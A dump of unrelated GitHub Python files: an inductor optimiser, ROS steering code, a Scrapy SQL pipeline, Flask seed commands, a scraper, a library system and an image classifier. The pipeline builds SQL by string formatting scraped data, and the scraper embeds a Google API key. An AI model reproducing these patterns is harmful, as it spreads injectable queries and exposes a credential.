print('rho={:.4f}'.format(self.rho))\n\n def generateFasthenryInputFile(self, start_x, start_y):\n\n n = self.n * 4 + 1\n w = self.w\n h = self.h\n nwinc = self.nwinc\n nhinc = self.nhinc\n\n fasthenry = ''\n title = '** Planar Inductor **\\n'\n fasthenry += title\n units = '* The following line names millimeters as the length units for the rest\\n'\n units += '* of the file.\\n'\n units += '.Units MM\\n\\n'\n fasthenry += units\n defaults = ''\n defaults += '* Make z=0 the default z coordinate and copper the default conductivity.\\n'\n defaults += '* Note that the conductivity is in units of 1/(mm*Ohms), and not 1/(m*Ohms)\\n'\n defaults += '* since the default units are millimetres\\n'\n defaults += '.Default z=0 sigma=5.9595e4\\n\\n'\n fasthenry += defaults\n\n nodes = ''\n nodes += '* The nodes of the planar inductor (z=0 is the default)\\n'\n nodeCoordinates_x = []\n nodeCoordinates_y = []\n for i in range(len(start_x)):\n nodeCoordinates_x.append('{}'.format(start_x[i]))\n nodeCoordinates_y.append('{}'.format(start_y[i]))\n nodeCoordinates_x.append('{}'.format(start_x[-1]))\n nodeCoordinates_y.append('{}'.format(-1 * start_y[-1]))\n\n for node in range(len(nodeCoordinates_x)):\n nodes += '{:10} x={:10} y={:10}\\n'.format('N' + str(node + 1), nodeCoordinates_x[node],\n nodeCoordinates_y[node])\n\n nodes += '\\n\\n* The segments connecting the nodes\\n'\n for node in range(n - 1):\n nodes += 'E{0} N{0} N{1} w={2} h={3} nhinc={4} nwinc={5}\\n'.format(node + 1, node + 2, w, h, nhinc, nwinc)\n nodes += '\\n* Define one input \\'port\\' of the network\\n'\n nodes += '.external N{} N{}\\n'.format(1, n)\n nodes += '\\n* Frequency range of interest\\n'\n nodes += '.freq fmin=200000 fmax=200000 ndec=1\\n\\n'\n nodes += '.end\\n'\n\n fasthenry += nodes\n\n filename = \"planar_inductor.inp\"\n f = open(filename, \"w+\")\n f.write(fasthenry)\n f.close()\n\n return fasthenry\n\n def nodes2XAndY(self, nodes):\n x = []\n y = []\n for node in nodes:\n x.append(np.round(node.x, 3))\n y.append(np.round(node.y, 3))\n return x, y\n\n def determineImpedanceOfSquarePlanarInductorUsingFasthenry(self):\n nodes = self.getStartEndCoords()\n x, y = self.nodes2XAndY(nodes)\n self.generateFasthenryInputFile(x, y)\n inp = \"planar_inductor.inp\"\n if os.path.exists(inp):\n logfile = 'logfile.txt'\n output_to_logfile = open(logfile, 'w+')\n if os.path.exists('Zc.mat'):\n os.remove('Zc.mat')\n p = Popen([\"fasthenry\", inp], stdout=output_to_logfile, stderr=subprocess.PIPE, universal_newlines=True)\n p.wait()\n\n if os.path.exists('Zc.mat'):\n lines = []\n f = open('Zc.mat', 'r')\n for line in f:\n lines.append(line)\n f.close()\n z = lines[-1].split()\n z = complex(float(z[0]), float(z[1][:-1]))\n self.inductance = z.imag / (2 * math.pi * 200000)\n if self.v:\n print('Zc.mat successfully created.')\n print('real part of impedance = {}'.format(z.real))\n print('imag part of impedance = {}'.format(z.imag))\n print('Fasthenry determined Inductance of the planar inductor to be: {}H'.format(\n EngNumber(self.inductance, precision=3)))\n else:\n print(self.inductance)\n else:\n print('Zc.mat NOT generated!')\n sys.exit()\n else:\n print(\"The file 'planar_inductor.inp' the input file to Fasthenry doesn't exist!\")\n sys.exit()\n\n return self.inductance\n\n def runOptimization(self):\n\n n = 1\n din = 0.856\n w = 0.128\n s = 0.128\n targetInd: float = self.o\n\n def errfunc(x, grad):\n if grad.size > 0:\n grad = None\n self.s = x[0]\n self.w = x[1]\n self.din = x[2]\n self.n = int(x[3])\n self.dout = self.din + 2 * self.n * self.w + 2 * (self.n - 1) * self.s\n self.rho = (self.dout - self.din)/(self.dout + self.din)\n print('\\n=====> s={}'.format(EngNumber(x[0], precision=3)))\n print('=====> w={}'.format(EngNumber(x[1], precision=3)))\n print('=====> din={}'.format(EngNumber(x[2], precision=3)))\n print('=====> n={}'.format(EngNumber(x[3], precision=3)))\n print('=====> dout={}'.format(self.dout))\n print('=====> rho={:.4f}'.format(self.rho))\n\n ind = self.determineImpedanceOfSquarePlanarInductorUsingFasthenry()\n print('=====> ind={}'.format(ind))\n self.L = ind\n err = math.fabs(ind - targetInd)\n return err\n\n def din_constraint(x,grad):\n if grad.size > 0:\n grad = None\n s = x[0]\n din = x[2]\n return 2*s + 0.6 - din\n\n def rho_constraint(x,grad):\n if grad.size > 0:\n grad = None\n s = x[0]\n w = x[1]\n din = x[2]\n n = int(x[3])\n dout = din + 2 * n * w + 2 * (n - 1) * s\n rho = (dout - din)/(dout + din)\n return 0.9 - rho\n\n\n opt = nlopt.opt(nlopt.LN_COBYLA, 4) # opt = nlopt.opt(algorithm, n), (n, the number of optimization parameters)\n s_min = 0.128\n w_min = 0.128\n din_min = 0.856\n n_min = 1\n\n opt.set_min_objective(errfunc)\n opt.add_inequality_constraint(lambda x, grad: din_constraint(x, grad), 1e-8)\n opt.add_inequality_constraint(lambda x, grad: rho_constraint(x, grad), 1e-8)\n opt.set_lower_bounds([s_min, w_min, din_min, n_min])\n opt.set_upper_bounds([ 1, 1, 40, 100])\n opt.set_xtol_rel(1e-6)\n x = opt.optimize([s, w, din, n])\n \n minf = opt.last_optimum_value()\n print(\"optimum at \", x[0])\n print(\"minimum value = \", minf)\n print(\"result code = \", opt.last_optimize_result())\n print('\\nOptimized values for an inductor with impedance {}H are:'.format(EngNumber(self.L, precision=3)))\n print('** s={}'.format(EngNumber(self.s, precision=0)))\n print('** w={}'.format(EngNumber(self.w, precision=0)))\n print('** din={}'.format(EngNumber(self.din, precision=3)))\n print('** n={}'.format(EngNumber(self.n, precision=0)))\n print('** dout={}'.format(EngNumber(self.din + 2 * self.n * self.w + 2 * (self.n - 1) * self.s, precision=3)))\n print('** rho={:.4f}'.format(self.rho))\n self.formKiCadFootprint()\n return x[0]\n\n\ndef main(args):\n sk = Scikic()\n lmw, lgmd, lmon = sk.calculateInductance()\n if sk.v:\n print(\n 'lmw = {}H, lgmd={}H. lmon={}H'.format(EngNumber(lmw, precision=3), EngNumber(lgmd, precision=3),\n EngNumber(lmon, precision=3)))\n sk.determineImpedanceOfSquarePlanarInductorUsingFasthenry()\n footprint = sk.formKiCadFootprint()\n if sk.o:\n sk.runOptimization()\n if sk.f:\n filename = 'planar_inductor_{:.3f}_{:.3f}_{:.3f}_{}.kicad_mod'.format(sk.din, sk.w, sk.s, sk.n)\n f = open(filename, 'w+')\n f.write(footprint)\n f.close()\n if sk.v:\n print('Footprint saved to file {}'.format(filename))\n return 0\n\n\nif __name__ == '__main__':\n import sys\n import textwrap\n from engineering_notation import EngNumber\n import argparse\n from argparse import RawTextHelpFormatter\n import os\n import math\n import subprocess\n from subprocess import Popen, PIPE\n import par\n import numpy as np\n import scipy.optimize as optimize\n import minizinc\n\n useNLopt = True\n try: # check if nlopt is available\n import nlopt\n except ImportError:\n print(\"nlopt not unavailable!\")\n useNLopt = False\n\n sys.exit(main(sys.argv))\n","repo_name":"quaffle51/scikic","sub_path":"scikic.py","file_name":"scikic.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39902821099","text":"\"\"\"\n Usage:\n target_angle_listener = TargetAngleListener()\n target_angle_listener.start()\n\n actual_angle_listener = AngleSensorListener()\n actual_angle_listener.start()\n\n actual_angle = actual_angle_listener.get_latest_actual_angle()\n target_angle = target_angle_listener.get_latest_target_angle()\n\n Parameters:\n wheel_base - double, distance between the wheels of the model.\n\n\"\"\"\nimport rospy\nfrom math import atan, pi\n\nfrom roboy_middleware_msgs.msg import MotorCommand, MotorAngle, MotorConfig\nfrom roboy_middleware_msgs.srv import MotorConfigService\nfrom geometry_msgs.msg import Twist\n\nMOTOR_CONTROL_POSITION = 0\nMOTOR_CONTROL_VELOCITY = 1\nMOTOR_CONTROL_DISPLACEMENT = 2\n\n\ndef rad_to_deg(val):\n return val / pi * 180\n\n\ndef deg_to_rad(val):\n return val / 180 * pi\n\n\n# Taken from http://docs.ros.org/kinetic/api/teb_local_planner/html/cmd__vel__to__ackermann__drive_8py_source.html\ndef convert_trans_rot_vel_to_steering_angle(lin_vel, ang_vel, wheelbase):\n if ang_vel == 0 or lin_vel == 0:\n return 0\n\n radius = lin_vel / ang_vel\n return atan(wheelbase / radius)\n\n\nclass TargetAngleListener:\n\n def __init__(self):\n self.target_angle = 0\n\n def start(self):\n self.wheel_base = rospy.get_param('~wheel_base')\n self.listen_to_navigation_controller()\n\n def listen_to_navigation_controller(self):\n def navigation_commands_receiver(twist):\n angular_velocity = twist.angular.z\n linear_velocity = 1.0\n self.target_angle = convert_trans_rot_vel_to_steering_angle(\n linear_velocity, angular_velocity, self.wheel_base\n )\n\n rospy.Subscriber('/cmd_vel', Twist, navigation_commands_receiver)\n\n def get_latest_target_angle(self):\n return self.target_angle\n\n\nclass AngleSensorListener:\n\n def __init__(self, zero_angle_raw=2450, decay=0.95, threshold=0.1 / 180 * pi):\n \"\"\"\n :param zero_angle_raw: sensor value corresponding to zero steering angle.\n :param decay: smooth_angle is computed as\n angle = decay*angle + (1-decay)*new_angle\n :param threshold: smooth_angle is updated if difference between the new\n and the last value is larger than the provided\n threshold.\n\n \"\"\"\n self.actual_angle = 0\n self.smooth_angle = 0\n self.last_smooth_angle = 0\n self.decay = decay\n self.threshold = threshold\n self.zero_angle_raw = zero_angle_raw\n\n def start(self):\n self.listen_to_angle_sensor()\n\n def listen_to_angle_sensor(self):\n def angle_receiver(raw_angle):\n if len(raw_angle.raw_angles) != 1:\n rospy.logerr('Invalid motor_angle command received')\n angle = float(\n raw_angle.raw_angles[0] - self.zero_angle_raw) \\\n / 4096 * 2 * pi\n self.actual_angle = angle\n self.smooth_angle = self.smooth_out(angle)\n if abs(self.smooth_angle - self.last_smooth_angle) > self.threshold:\n self.last_smooth_angle = self.smooth_angle\n\n rospy.Subscriber('/roboy/middleware/StearingAngle', MotorAngle,\n angle_receiver)\n\n def get_latest_actual_angle(self):\n \"\"\"\n Last known steering angle, not processed.\n \"\"\"\n return self.actual_angle\n\n def get_latest_smooth_angle(self):\n \"\"\"\n Last known steering angle.\n Smoothed using the exponential smoothing\n https://en.wikipedia.org/wiki/Exponential_smoothing\n to filter out the noise.\n \"\"\"\n return self.last_smooth_angle\n\n def smooth_out(self, angle):\n return self.decay * self.smooth_angle + (1 - self.decay) * angle\n\n\nclass MyoMuscleController:\n\n def __init__(self, fpga_id, left_motor_id, right_motor_id, init_disp=10):\n self.fpga_id = fpga_id\n self.left_motor_id = left_motor_id\n self.right_motor_id = right_motor_id\n self.init_disp = init_disp\n\n def start(self):\n self.publisher = rospy.Publisher('/roboy/middleware/MotorCommand',\n MotorCommand,\n queue_size=1)\n rospy.logwarn('CAREFUL! Myo-muscle controller is activated, '\n 'rickshaw will start turning if cmd_vel command is set.')\n self.set_control_mode()\n\n def set_control_mode(self):\n config_motors_service = rospy.ServiceProxy(\n '/roboy/unknown/middleware/MotorConfig',\n MotorConfigService\n )\n config = MotorConfig(\n id=self.fpga_id,\n motors=[self.left_motor_id, self.right_motor_id],\n control_mode=[MOTOR_CONTROL_DISPLACEMENT, MOTOR_CONTROL_DISPLACEMENT],\n output_pos_max=[1000, 1000],\n output_neg_max=[-1000, -1000],\n sp_pos_max=[1000000, 1000000],\n sp_neg_max=[-1000000, -1000000],\n integral_pos_max=[1000, 1000],\n integral_neg_max=[-1000, -1000],\n kp=[200, 200],\n ki=[0, 0],\n kd=[0, 0],\n forward_gain=[0, 0],\n dead_band=[0, 0],\n output_divider=[1, 1],\n setpoint=[self.init_disp, self.init_disp]\n )\n config_motors_service(config)\n\n def send_command(self, effort_left, effort_right):\n command = MotorCommand()\n command.id = self.fpga_id\n command.motors = [self.left_motor_id, self.right_motor_id]\n command.set_points = [effort_left, effort_right]\n self.publisher.publish(command)\n","repo_name":"Roboy/autonomous_driving_src","sub_path":"roboy_navigation/src/roboy_navigation/steering_helper.py","file_name":"steering_helper.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8758948045","text":"if __name__ == \"__main__\":\n #分割数据\n #加载数据\n from sklearn.datasets import load_iris\n import pandas as pd\n from binning_woe.binning.sklearn_bin import NumtoCategorical as nc\n from binning_woe.sklearn_woe import CattoWoe\n iris = load_iris()\n df=pd.concat([pd.DataFrame(iris.data),pd.DataFrame(iris.target)],ignore_index=True,axis=1)\n df.columns=iris.feature_names+['target']\n df=df[df['target'].isin([1,2])]\n #分割数据\n Sp=nc(bins_num=3,num_cols=iris.feature_names)\n clf=Sp.fit(df,'target',split_func='chi')\n dff=clf.transform()\n\n Cw=CattoWoe('target')\n wclf=Cw.fit(dff)\n wdf=wclf.transform()\n print(wdf.head())\n\n from sklearn.linear_model import LogisticRegression\n from sklearn.model_selection import train_test_split\n from sklearn.metrics import classification_report\n cols=list(filter(lambda item:item !='target',wdf.columns))\n X,x_test,Y,y_test=train_test_split(wdf[cols],wdf['target'],test_size=0.33,shuffle=True)\n clf = LogisticRegression()\n clf.fit(X, Y)\n score_test = classification_report(y_test, clf.predict(x_test))\n print(score_test)\n X,x_test,Y,y_test=train_test_split(df[cols],df['target'],test_size=0.33,shuffle=True)\n clf = LogisticRegression()\n clf.fit(X, Y)\n score_test = classification_report(y_test, clf.predict(x_test))\n print(score_test)","repo_name":"lphcreat/binning-and-woe","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14403837659","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\n\nimport pyodbc\n#import datetime\n#from datetime import date, timedelta\nfrom twisted.enterprise import adbapi\nimport re\nimport os\nimport platform\nimport json\nimport logging\nimport scrapy\nfrom scrapy import crawler\n#from data.states import states\n#from data.status_map import status_map\n#from data.availability_map import avail_map\n#from data.update_trigger_fields import update_fields\nfrom .items import AgentsItem\nfrom .items import AgenciesItem\n\n\n#from itemadapter import ItemAdapter\n\n\nclass AgencylistingscommercialPipeline:\n\n\n \n table_name = \"\"\n \n connection = ''\n\n spider = {}\n\n def __init__(self):\n pass\n\n\n async def process_item(self, item, spider):\n\n\n \n if isinstance(item, AgenciesItem):\n \n await spider.connection.runQuery(self.insert_query_agency(item))\n\n elif isinstance(item, AgentsItem):\n \n await spider.connection.runQuery(self.insert_query_agent(item))\n\n\n return item\n\n\n\n def insert_query_agency(self, item):\n try:\n query = \"\"\"BEGIN SET NOCOUNT ON; INSERT INTO AgenciesCommercial VALUES (\n '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\n ); SELECT 0; END\"\"\".format(\n \n item['name'], item['url'], item['agent_count'], item['market_count'],\n item['brisbane_council_markets'], item['brisbane_council_markets_percent'], item['state'], item['markets'], item['source'], item['sale_type'], \n )\n \n return query\n except Exception as e:\n logging.error(\"Error In insert query building\")\n #logging.error(item['listing_web_address'])\n logging.error(e, exc_info=True)\n\n\n\n\n def insert_query_agent(self, item):\n try:\n query = \"\"\"BEGIN SET NOCOUNT ON; INSERT INTO Agents VALUES (\n '{}', '{}', '{}', '{}', '{}', '{}'\n ); SELECT 0; END\"\"\".format(\n \n item['url'], item['first_name'], item['last_name'], item['mobile_number'], item['email'],\n item['agency_url'], \n )\n\n\n return query\n except Exception as e:\n logging.error(\"Error In insert query building\")\n #logging.error(item['listing_web_address'])\n logging.error(e, exc_info=True)\n\n\n\n\n def open_spider(self, spider):\n #self.start_time = datetime.datetime.now()\n\n print(\"Detecting drivers to connect with database...\")\n drivers = [item for item in pyodbc.drivers()]\n # print(\"Driver List: \")\n # print(drivers)\n\n # print(\"Selected driver for connection:\")\n driver = drivers[-1]\n # print(driver)\n\n print(\"Connecting to database...\", spider.settings.get('SERVER'), spider.settings.get('DATABASE'), \"1433\")\n try:\n # Connection string for freetds lib\n self.connection = adbapi.ConnectionPool(\n \"pyodbc\",\n driver=driver,\n TDS_Version='8.0',\n server=spider.settings.get('SERVER'),\n port=1433,\n database=spider.settings.get('DATABASE'),\n uid=spider.settings.get('USERNAME'),\n pwd=spider.settings.get('PASSWORD'),\n autocommit=True\n )\n\n spider.connection = self.connection\n\n # setting spider attaching getSuburbs method to spider to fetch suburbs from database\n self.spider = spider\n #spider.getSuburbs = self.getSuburbs\n #spider.predictItemPropertyType = self.predictItemPropertyType\n self.table_name = spider.settings.get('LISTING_TABLE')\n\n # Connection string for msodbcsql lib\n # self.dbpool = adbapi.ConnectionPool(\"pyodbc\", \"Driver={\"+driver+\"};Server=tcp:server-remap-io.database.windows.net,1433;Database=db-remap.io;Uid=\"+username+\";Pwd=\"+password+\";Encrypt=yes;TrustServerCertificate=no;Connection Timeout=30;\", autocommit=True)\n # self.dbpool.runQuery(\"Select top (1) * from Scraped_data;\").addCallback(self.printResult)\n\n print(\"Connected to database...\")\n\n # calculating day for full or limited scrapes\n #print(\"========== > Calculated Day: \" + str(self.day_of_week_number) + \" ( \" + self.day_of_week_name + \" ) \")\n spider.stop = False\n except Exception as e:\n print(\"=================== Connection to database failed ===================\")\n print(e)\n","repo_name":"priosuwanto/agencylistingscommercial","sub_path":"agencylistingscommercial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2928795376","text":"from main import db\nfrom flask import Blueprint\n\ndb_commands = Blueprint(\"db-custom\", __name__)\n\n@db_commands.cli.command(\"create\")\ndef create_db():\n db.create_all()\n print(\"Tables created!\")\n\n@db_commands.cli.command(\"drop\")\ndef drop_db():\n db.drop_all()\n db.engine.execute(\"DROP TABLE IF EXISTS alembic_version;\")\n print(\"Tables deleted\")\n\n@db_commands.cli.command(\"seed\")\ndef seed_db():\n from models.Animal import Animal\n from models.Shelter import Shelter\n import random\n\n shelters = []\n\n for i in range(5):\n shelter = Shelter()\n shelter.name = f\"Shelter {i}\"\n shelter.email = f\"test{i}@email.com\"\n shelter.phone = \"000000000\"\n shelter.address = f\"{i} Bilbi Street\"\n shelter.city = \"Shelter City {i}\"\n db.session.add(shelter)\n shelters.append(shelter)\n\n db.session.commit()\n\n for i in range(15):\n animal = Animal()\n animal.name = f\"Animal{i}\"\n animal.kind = f\"Kind{i}\"\n animal.breed = f\"Breed{i}\"\n animal.age = f\"{i + 13} weeks\"\n animal.shelter_id = random.choice(shelters).id\n db.session.add(animal)\n \n db.session.commit()\n print(\"Tables seeded\")","repo_name":"rheal3/Animals-Shelters","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6378303422","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 6 13:36:13 2017\n\n@author: jean-marcsevin\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'https://www.insee.fr/fr/statistiques/1906659'\n\ndef get_soup(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n return soup\n\ndef clean_commune(item):\n return str(item).replace(\"\",\"\").replace(\"\",\"\")\n\ndef calc_distance(origin, destination):\n r = requests.get(\"https://maps.googleapis.com/maps/api/distancematrix/json?origins=\" + origin + \"&destinations=\" + destination + \"&language=fr-FR&key=AIzaSyDhnRwPrt4EQqiQg3Q-hNcAXsk0Iy5qCcg\")\n return r.json()['rows'][0]['elements'][0]['distance']['text']\n\nsoup = get_soup(url)\n\ncommunes_raw = soup.find('table', attrs={\"id\": \"produit-tableau-T16F014T4\"}).find('tbody').find_all('th')[1::2]\ncommunes = [clean_commune(item) for item in communes_raw]\n\nnb_Communes = len(communes)\n\ndf = pd.DataFrame(index=communes, columns=communes)\n\n# Il manque la routine pour construire la matrice et l'exporter au format CSV ","repo_name":"MS-BGD-2018-KIT-BIGDATA/JeanMarc_SEVIN","sub_path":"Lesson3/exo_cc_lesson_03.py","file_name":"exo_cc_lesson_03.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10628374308","text":"import json\nimport BookItem\nimport LoanItem\nimport csv\nCURRENTUSER = 0\n\n\nclass Book():\n \"\"\"This is a book class\"\"\"\n\n def __init__(self, author, country, imageLink, language, link, pages, title, isbn,\n year):\n self.author = author\n self.country = country\n self.imageLink = imageLink\n self.language = language\n self.link = link\n self.pages = pages\n self.ISBN = isbn\n self.title = title\n self.year = year\n\n def __repr__(self):\n return self.author + \", \" + self.country + \", \" + self.imageLink + \", \" + self.language + \", \" + str(\n self.link) + \", \" + str(self.pages) + \", \" + self.title + \", \" + str(self.ISBN) + \", \" + str(self.year) + \"\\n\"\n\n def writeToDatabase(self):\n with open('BookDatabase.json') as json_file:\n data = json.load(json_file)\n\n book_data = {\n \"author\": self.author,\n \"country\": self.country,\n \"imageLink\": self.imageLink,\n \"language\": self.language,\n \"link\": self.link,\n \"pages\": self.pages,\n \"title\": self.title,\n \"ISBN\": self.ISBN,\n \"year\": self.year\n }\n data.append(book_data)\n with open(\"BookDatabase.json\", 'w', ) as f:\n json.dump(data, f, indent=4)\n\n def showBook(self, CURRENTUSER):\n print(\"[Book] Author: \" + self.author)\n print(\"[Book] Country: \" + self.country)\n print(\"[Book] Image Link: \" + self.imageLink)\n print(\"[Book] Language: \" + self.language)\n print(\"[Book] Link: \" + self.link)\n print(\"[Book] ISBN: \" + str(self.ISBN))\n print(\"[Book] Pages: \" + str(self.pages))\n print(\"[Book] Title: \" + self.title)\n print(\"[Book] Year: \" + str(self.year))\n a = LoanItem.LoanItem(\"none\", \"none\", \"none\")\n if a.loanAvailabilityCheck(self.findISBN(), self.author, self.title):\n while True:\n print(\"[Book]\")\n userInput = input(\"[Book] Would you like loan this book (y/n): \")\n if userInput == \"y\":\n if LoanItem.LoanItem.limitCheck(CURRENTUSER) == False:\n print(\"user already has 3 books\")\n break\n loanItem = LoanItem.LoanItem(CURRENTUSER, 30, self.findISBN())\n loanItem.writeToDatabase()\n print(\"[Book] Loan successfully administrated.\")\n print(\"[Book]\")\n break\n if userInput == \"n\":\n return\n print(\"[Book] Invalid input, please try again. \")\n else:\n input(\"[Book] No book available, press any key to go back!\")\n\n def findISBN(self):\n\n bookItemList = []\n\n with open(\"BookItemDatabase.csv\", mode='r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n for r in csv_reader:\n bookItemList.append(BookItem.BookItem(r[0], r[1], r[2], r[3]))\n for bookItem in bookItemList:\n if bookItem.author == self.author and bookItem.title == self.title:\n return bookItem.ISBN\n\n def deleteBook(self):\n new_list = []\n with open(\"BookDatabase.json\", mode='r', newline='') as read_file:\n tmp = json.load(read_file)\n for r in tmp:\n if self.ISBN == r['ISBN']:\n print(\"skip\")\n else:\n new_list.append(r)\n print(r.__repr__())\n print(new_list)\n with open(\"BookDatabase.json\", mode='w', newline='') as read_file:\n json.dump(new_list, read_file, indent=4)\n\n def editBook(self):\n new_list = []\n with open(\"BookDatabase.json\", mode='r', newline='') as read_file:\n tmp = json.load(read_file)\n for r in tmp:\n if r['ISBN'] == self.ISBN:\n r[\"author\"] = input(\"new author \")\n r[\"country\"] = input(\"new country \")\n r[\"imageLink\"] = input(\"new imageLink \")\n r[\"language\"] = input(\"new language\")\n r[\"link\"] = input(\"new link\")\n r[\"pages\"] = input(\"new pages\")\n r[\"title\"] = input(\"new title\")\n r[\"year\"] = input(\"new year\")\n new_list.append(r)\n else:\n new_list.append(r)\n\n with open(\"BookDatabase.json\", mode='w', newline='') as read_file:\n json.dump(new_list, read_file, indent=4)\n","repo_name":"0996736Ilias/schoolopdracht","sub_path":"public-library-system-master/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19977022654","text":"import time\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Input\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.imagenet_utils import preprocess_input\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import ShuffleSplit, GridSearchCV\nfrom sklearn import metrics\n\nfrom keras import backend as K\nK.set_image_dim_ordering('tf')\n\n# Loading data\nX = pd.read_pickle('data/images.pkl')\ny = pd.read_pickle('data/info.pkl')\ny = y['followers_count']\n\"\"\"\ny2 = pd.read_pickle('data/gender2_complete.pkl')\nX2 = y2['image']\ny2 = y2['followers_count']\n\ny3 = pd.read_pickle('data/gender_complete.pkl')\nX3 = y3['image']\ny3 = y3['followers_count']\n\ny4 = pd.read_pickle('data/volkova_complete.pkl')\nX4 = y4['image']\ny4 = y4['followers_count']\n\nX = pd.concat([X, X2, X3, X4])\ny = pd.concat([y, y2, y3, y4])\n\"\"\"\nprint('shape y: ', y.shape)\nprint('shape X: ', X.shape)\nX = X.as_matrix()\nX = np.stack([array for array in X])\nX = preprocess_input(X.astype('float16'))\nprint('shape X: ', X.shape)\n\n# load VGG16\nbase_model = VGG16(weights='imagenet', include_top=True, input_tensor=Input(shape=(224,224,3)))\nprint('vgg16 model loaded')\n\ndatagen = ImageDataGenerator(\n rotation_range=60,\n zoom_range=0.2,\n horizontal_flip=True,\n )\n\nbatch_size = 32\n\npredict_generator = datagen.flow(X, batch_size=batch_size, shuffle=False)\n\n# Go over the images twice in this generator\nX_features = base_model.predict(X)\n#X_features = base_model.predict_generator(predict_generator, steps=len(X)// (batch_size/2) +2, verbose=1)\nprint('vgg features done')\nprint('shape X: ', X_features.shape)\n\n#X_shape = X_features.shape[0]\n#X_features = X_features.reshape(X_shape, 25088)\n#print('shape X_features:', X_features.shape)\n#print('predict X_features done')\n\n# Preprocessing age & gender\ngender = pd.get_dummies(y['gender']).as_matrix()\nprint('shape dummies:', gender.shape)\nX_features = np.hstack((X_features, gender))\nprint('shape after adding gender:', X.shape)\n\nage = pd.to_numeric(y['age'], errors='coerce')\nage.fillna(age.mean(), inplace=True)\nage_bins = [0, 13, 20, 37, 66, 100]\nage = pd.cut(age, age_bins, labels=False)\nprint(age[:5])\nprint('dummies age:', np.bincount(age))\nage = pd.get_dummies(age).as_matrix()\n\nX_features = np.hstack((X_features, age))\nprint('shape after adding age:', X.shape)\nprint('shape y:', y.shape)\n\nquantiles = [x/100 for x in range(0, 101, 5)]\nnum_classes = len(quantiles)-1\nbins = y.quantile(q=quantiles)\nbins = list(bins)\nbins[0] -= 1 #otherwise it will not pick up the lowest number\ny = pd.cut(y, bins, labels=False)\nprint('shape y: ' , y.shape)\nprint('bins:', bins)\nprint('bincount:', np.bincount(y))\n\n# Test 80%, val 15%, test 5%\nX_train, X_val, y_train, y_val = train_test_split(X_features, y, test_size=0.2, random_state=1)\nX_val, X_test, y_val, y_test = train_test_split(X_val, y_val, test_size=0.25, random_state=1)\n\nprint('shape X_train:', X_train.shape)\nprint('shape y_train:', y_train.shape)\nprint('shape X_val:', X_val.shape)\nprint('shape y_val:', y_val.shape)\nprint('bincount y_val:', np.bincount(y_val))\nprint('shape X_test:', X_test.shape)\nprint('shape y_test:', y_test.shape)\nprint('bincount y_test:', np.bincount(y_test))\nprint(y_val[:5])\n\nparameters = {\n# 'kernel': ('linear', 'sigmoid', 'poly'),\n# 'decision_function_shape': ('ovr', 'ovo'),\n# 'degree': (1, 3, 5, 10),\n# 'C': (0.5, 1, 1.5, 2),\n }\n\ngs = GridSearchCV(\n SVC(decision_function_shape='ovr', kernel='linear', C=1.5, class_weight='balanced'),\n parameters, n_jobs=-1, verbose=1,\n # seed matches others. Validation set is bigger\n cv=ShuffleSplit(test_size=0.20, n_splits=1, random_state=1))\n\nstart = time.time()\nprint('fitting....')\ngs = gs.fit(X_train, y_train)\nend = time.time()\nprint('training time', end - start)\n\nprint(\"Best score:\", gs.best_score_)\nprint()\nfor parameter in sorted(parameters.keys()):\n print(\"%s: %r\" % (parameter, gs.best_params_[parameter]))\n\n# Predict & evaluate\ny_pred_val = gs.predict(X_val)\nstart = time.time()\ny_pred_test = gs.predict(X_test)\nend = time.time()\n\nfs = open('info.txt', 'w')\nfs.write('Acc val: ' + str(metrics.accuracy_score(y_val, y_pred_val)) + '\\n')\nfs.write('MAE val: ' + str(metrics.mean_absolute_error(y_val, y_pred_val)) + '\\n')\nfs.write('CF val: ' + str(metrics.confusion_matrix(y_val, y_pred_val)) + '\\n')\nfs.write('Acc test: ' + str(metrics.accuracy_score(y_test, y_pred_test)) + '\\n')\nfs.write('MAE test: ' + str(metrics.mean_absolute_error(y_test, y_pred_test)) + '\\n')\nfs.write('CF test: ' + str(metrics.confusion_matrix(y_test, y_pred_test)) + '\\n')\nfs.close()\n","repo_name":"ThomasRthesis/thesis-final","sub_path":"VGG-P-SVM.py","file_name":"VGG-P-SVM.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11370413436","text":"from tkinter import *\n\nraiz = Tk()\n\nraiz.title(\"Ventana de Prueba\")\n\nraiz.resizable(True, True)\n\nraiz.iconbitmap(\"tecno.ico\")\n\nraiz.geometry(\"500x500\")\n\nraiz.config(bg=\"black\")\n\nraiz.mainloop() #esta instruccion debe estar siempre al 